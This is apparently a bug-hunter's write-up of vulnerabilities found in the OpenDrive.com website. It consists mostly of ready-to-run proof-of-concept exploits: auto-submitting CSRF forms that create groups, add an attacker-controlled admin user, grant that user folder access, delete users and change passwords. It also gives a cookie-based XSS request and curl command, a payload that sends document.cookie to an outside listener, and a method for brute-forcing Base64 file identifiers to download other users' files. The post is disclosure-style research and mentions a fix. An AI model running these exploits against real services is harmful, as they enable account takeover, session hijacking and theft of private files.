Pwning OpenDrive Users

After a long time being away from bug hunting I randomly found these few bugs in the OpenDrive.com website.

XSRF in Creating Groups

If an attacker can get a logged-in user to run the code below, the attacker can create groups of their own in that user's Users section. This is the proof of concept; after it runs you will see groups such as “pwned” being created.

<html>
<!-- Discovered by @OsandaMalith-->
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https://www.opendrive.com/ajax", true);
        xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
        xhr.withCredentials = true;
        var body = "action=create-usergroup&group_name=pwned&group_max_storage=5120&group_bw_max=1024";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Click Here to Pwn" onclick="submitRequest();" />
    </form>
  </body>
</html>

Complete Account Takeover XSRF

An attacker can completely take over the account of any user who runs the XSRF exploit in their browser while logged in.

Change the email in pwn.html to an address the attacker controls; once the victim loads this page, that address is added as an access user with full admin rights 🙂 Next, GetFolders.html grants that user full permissions on the victim's folders.

An attacker can host these pages on their own server and lure users into loading them. The fix is to require CSRF tokens on these requests.

File: pwn.html

<html>
<!-- Discovered by @OsandaMalith-->
  <body>
    <form name="0day" action="https://www.opendrive.com/ajax" method="POST">
      <input type="hidden" name="action" value="create-accessuser" />
      <input type="hidden" name="access_first_name" value="Eve" />
      <input type="hidden" name="access_last_name" value="Haxor" />
      <input type="hidden" name="access_password" value="pwned" />
      <input type="hidden" name="access_email" value="youremail@yopmail.com" />
      <input type="hidden" name="access_admin_mode" value="1" />
      <input type="hidden" name="access_notification" value="0" />
      <input type="hidden" name="access_max_storage" value="5120" />
      <input type="hidden" name="access_bw_max" value="1024" />
      <input type="hidden" name="group_id" value="110701" />
      <input type="hidden" name="access_phone" value="123" />
      <input type="hidden" name="access_password_change" value="1" />
      <input type="hidden" name="access_position" value="Tester" />
      <input type="hidden" name="access_send_password" value="1" />
      <input type="submit" value="Click Here to Pwn an account" />
    </form>
  </body>
</html>

Next we take control of all folders. From the attacker's account we were able to open the “confidential.txt” file that lived inside the victim's account.

File: GetFolders.html

<html>
<!-- Discovered by @OsandaMalith-->
  <body>
    <form name="0day" action="https://www.opendrive.com/ajax" method="POST">
      <input type="hidden" name="action" value="set-folder-access" />
      <input type="hidden" name="access_email" value="haxor15@yopmail.com" />
      <input type="hidden" name="foldersObj[OTZfMTYxOTU0X1ljcFAw]" value="1" />
      <input type="hidden" name="foldersObj[OTZfMTYxOTU1X1FKWFk4]" value="1" />
      <input type="hidden" name="foldersObj[OTZfMTYxOTU2X05DMHlB]" value="1" />
      <input type="hidden" name="foldersObj[OTZfMTYxOTU3X1NKc1Jl]" value="1" />
      <input type="submit" value="Click Here to Pwn the Folders" />
    </form>
  </body>
</html>

Here is a proof of concept video I made to demonstrate this.

Delete Account XSRF

Once a user has added another user to their Users list, the delete action uses no XSRF token, so an attacker can delete any added user simply by specifying that user's email.

<html>
  <body>
    <form action="https://www.opendrive.com/ajax" method="POST">
      <input type="hidden" name="action" value="user-delete" />
      <input type="hidden" name="access_email" value="youremail@yopmail.com" />
      <input type="submit" value="Click Here to Delete" />
    </form>
  </body>
</html>

Change Password

We can change the user's password with the following XSRF exploit.

<html>
  <!-- Discovered by @OsandaMalith -->
  <body>
    <form action="https://www.opendrive.com/settings/profile" method="POST">
      <input type="hidden" name="_wpnonce" value="24ce7b505d" />
      <input type="hidden" name="user_info_old_password" value="OldPassword" />
      <input type="hidden" name="user_info_new_password" value="NewPassword" />
      <input type="hidden" name="user_info_repeat_password" value="NewPassword" />
      <input type="hidden" name="form_action" value="update_password" />
      <input type="submit" value="Change Password" />
    </form>
  </body>
</html>

Cookie Based XSS

I found a Cookie based XSS vulnerability in the domain admin.opendrive.com.

GET /login HTTP/1.1
Host: admin.opendrive.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: login_value="><svg/onload="alert('XSS by Osanda')">;
Connection: keep

curl -i -s -k -X 'GET' \
  -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0' \
  -b 'login_value="><svg/onload="alert(1337)">' \
  'http://admin.opendrive.com/login' | grep 1337

Because the cookies are not marked HttpOnly, and are not marked Secure either, the session cookies can be stolen through this XSS and used to access other accounts.

Here’s a demonstration of stealing the session cookie 🙂

<svg/onload=document.location='http://localhost:8000/?'+document.cookie>

Weak Encoding

I noticed that file identifiers can easily be brute-forced.

https://dev.opendrive.com/api/v1/download/file.json/OTZfMzA5NDU1Nl8=?inline=1

Base64 decoded, OTZfMzA5NDU1Nl8= is:
96_3094556_

These values can be brute-forced, re-encoded as Base64, and used to download other people's files.
